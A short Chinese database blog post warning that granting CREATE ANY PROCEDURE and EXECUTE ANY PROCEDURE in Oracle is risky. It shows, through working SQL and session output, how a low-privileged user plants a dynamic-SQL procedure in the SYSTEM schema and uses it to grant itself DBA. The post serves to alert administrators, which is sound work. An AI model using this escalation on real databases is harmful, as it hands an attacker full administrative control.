暂无图片
暂无图片
暂无图片
暂无图片
暂无图片

过度授权的风险

原创 不吃草的牛_Nick 2022-06-30
278

create user nick identified by nick;
grant create session to nick;
grant create any procedure to nick;
grant execute any procedure to nick;

现在CREATE ANY PROCEDURE的权限可以使用户创建任何过程:

conn nick/nick
CREATE OR REPLACE PROCEDURE SYSTEM.DO(P_TEXT VARCHAR2)
IS
BEGIN
EXECUTE IMMEDIATE P_TEXT;
END;
/

现在EXECUTE ANY PROCEDURE的权限,可以使用户执行创建的过程,进行跨越职权的授权:

execute system.do('grant dba to nick');

检查一下当前用户具有的权限:
SELECT * FROM SESSION_PRIVS;
PRIVILEGE
----------------------------------------
CREATE SESSION
UNLIMITED TABLESPACE
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE

SELECT * FROM SESSION_ROLES;
ROLE
------------------------------
PLUSTRACE

重新连接会激活角色授权,可以注意到用户已经具备了DBA的职权:
connect nick/nick
SELECT * FROM SESSION_ROLES;

ROLE
------------------------------
PLUSTRACE
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
GATHER_SYSTEM_STATISTICS
WM_ADMIN_ROLE
JAVA_ADMIN
JAVA_DEPLOY

SELECT * FROM SESSION_PRIVS;

PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
CREATE TABLESPACE
ALTER TABLESPACE
MANAGE TABLESPACE
。。。。。。。。

「喜欢这篇文章,您的关注和赞赏是给作者最好的鼓励」
关注作者
【版权声明】本文为墨天轮用户原创内容,转载时必须标注文章的来源(墨天轮),文章链接,文章作者等基本信息,否则作者和墨天轮有权追究责任。如果您发现墨天轮中有涉嫌抄袭或者侵权的内容,欢迎发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

评论